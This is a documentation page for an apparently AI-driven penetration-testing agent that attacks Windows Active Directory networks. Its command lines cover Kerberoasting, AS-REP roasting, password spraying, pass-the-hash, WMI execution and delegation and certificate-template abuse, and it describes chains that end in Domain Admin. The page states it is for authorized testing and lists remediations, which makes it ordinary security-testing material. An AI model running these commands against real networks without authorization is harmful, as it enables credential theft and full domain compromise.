Skip to main content
The internal-network agent is a network and Active Directory specialist. It covers enumeration, credential attacks, lateral movement, and privilege escalation across Windows domain environments and internal networks.

Activating the agent

Press Tab until internal-network appears in the status bar, then describe your target environment.

Skills loaded

The agent automatically loads two skill files with detailed AD attack procedures:
SkillContent
ad-securityActive Directory enumeration, ACL abuse, GPO analysis, trust relationship exploitation
kerberos-attacksKerberoasting, AS-REP Roasting, Pass-the-Ticket, constrained/unconstrained delegation abuse

Tools

ToolUse
nmapPort scanning and service enumeration
BloodHoundActive Directory relationship mapping and attack path visualization
NetExec (CrackMapExec)Network exploitation and credential validation
KerbruteKerberos-based user enumeration without triggering lockout
ImpacketProtocol-level attacks: GetUserSPNs, secretsdump, psexec, wmiexec, ntlmrelayx
ResponderLLMNR/NBT-NS/mDNS poisoning for NTLMv2 hash capture
MimikatzCredential extraction from memory, DPAPI, SAM, NTDS
bashTool orchestration and scripting
report_vulnerabilityRecord findings with MITRE ATT&CK mapping

Testing methodology

1

Network reconnaissance

Port scanning with nmap to identify live hosts and services. Service version detection and banner grabbing on discovered ports. Network mapping to understand topology, segmentation, and routing. Identifies domain controllers, file servers, web servers, and other high-value targets.
nmap -sV -sC --top-ports 1000 -oA recon/network 192.168.1.0/24
2

Active Directory enumeration

Enumerates domain users, groups, computers, OUs, and trusts using BloodHound and Impacket. Identifies privileged users (Domain Admins, Enterprise Admins, Account Operators). Reviews Group Policy Objects for misconfigured software deployment or logon scripts. Analyzes ACL chains for paths from low-privilege users to Domain Admin using BloodHound’s attack path queries.
# BloodHound collection
bloodhound-python -d corp.local -u user -p 'password' -c All -ns 192.168.1.10

# User enumeration via LDAP
impacket-GetADUsers -all corp.local/user:'password' -dc-ip 192.168.1.10
3

Credential attacks

Kerberoasting — Requests Kerberos service tickets for accounts with SPNs and cracks them offline with hashcat. Targets service accounts that often have weak passwords and high privileges.AS-REP Roasting — Identifies accounts with pre-authentication disabled and requests AS-REP hashes for offline cracking without any credentials.Password spraying — Tests a single common password across all enumerated accounts using Kerbrute to avoid lockout. One attempt per account per window.NTLM relay — Uses Responder to capture NTLMv2 hashes from LLMNR/NBT-NS poisoning, then relays them with ntlmrelayx to authenticate to target services.
# Kerberoasting
impacket-GetUserSPNs corp.local/user:'password' -dc-ip 192.168.1.10 -request

# AS-REP Roasting
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.10

# Password spraying
kerbrute passwordspray -d corp.local --dc 192.168.1.10 users.txt 'Password123'
4

Lateral movement

Tests movement between hosts using captured credentials and hashes:
  • Pass-the-Hash — Authenticates to services using NTLM hashes without knowing plaintext passwords
  • Pass-the-Ticket — Uses captured Kerberos tickets for authentication
  • DCOM/WMI execution — Remote code execution via Windows management protocols
  • PSExec/WinRM — Remote shell via SMB named pipes or WinRM
# Pass-the-Hash via SMB
netexec smb 192.168.1.0/24 -u Administrator -H 'aad3b435...:31d6cfe0...'

# WMI execution
impacket-wmiexec corp.local/[email protected] -hashes ':NTHash'
5

Privilege escalation

Tests escalation from local admin to domain admin via:
  • Unconstrained delegation — Any host with unconstrained delegation can capture TGTs for any user authenticating to it
  • Resource-based constrained delegation (RBCD) — If msDS-AllowedToActOnBehalfOfOtherIdentity is writable, escalate to impersonate any user on the target
  • AD CS abuse — Misconfigured certificate templates (ESC1–ESC8) allow privilege escalation to Domain Admin via PKINIT
  • GPO abuse — Write access to a GPO linked to a high-privilege OU allows code execution as any user in that OU
# Find unconstrained delegation hosts
impacket-findDelegation corp.local/user:'password'

# AD CS template enumeration
certipy find -u [email protected] -p 'password' -dc-ip 192.168.1.10

Key attack chains

Start Responder to poison LLMNR/NBT-NS traffic. Wait for a host on the network to attempt name resolution for a non-existent host. Capture NTLMv2 hashes. Crack offline with hashcat or relay immediately with ntlmrelayx to authenticate to SMB shares or HTTP services without cracking.
Enumerate accounts with SPNs using GetUserSPNs. Request service tickets and extract hashes. Crack offline — service accounts often have weak passwords set years ago and never rotated. Use the cracked credentials to authenticate as the service account, which may have privileges over other systems or AD objects.
Collect BloodHound data. Query for shortest path from current user to Domain Admin. Identify ACL-based escalation: WriteDACL, GenericAll, WriteOwner on user or group objects. Exploit the ACL to add yourself to a privileged group or reset a privileged user’s password.
Enumerate certificate templates with Certipy. Find templates where low-privilege users can enroll, the template allows Client Authentication, and the Subject Alternative Name is user-supplied (ESC1). Request a certificate with [email protected] in the SAN. Use the certificate with PKINIT to get a TGT as Domain Admin.

Example workflows

cyberstrike run --agent internal-network \
  "Enumerate the domain corp.local — identify all users, groups, domain controllers, and map attack paths to Domain Admin using BloodHound"

Finding output format

Each finding the agent reports includes:
  • Attack vector — e.g., Kerberoasting
  • Target — Specific account or host affected
  • Severity — High / Medium / Low with CVSS score
  • MITRE ATT&CK — Technique ID, e.g., T1558.003
  • Evidence — Captured hash, cracked password, or access proof
  • Impact — What an attacker could achieve (e.g., domain compromise path)
  • Remediation — Specific fix, e.g., use Managed Service Accounts, enforce 25+ character service account passwords, enable AES-only Kerberos encryption
This agent is for authorized penetration testing only. Kerberoasting, NTLM relay, and Pass-the-Hash against systems you do not have written authorization to test may violate the Computer Fraud and Abuse Act (CFAA) and equivalent laws in other jurisdictions.

Build docs developers (and LLMs) love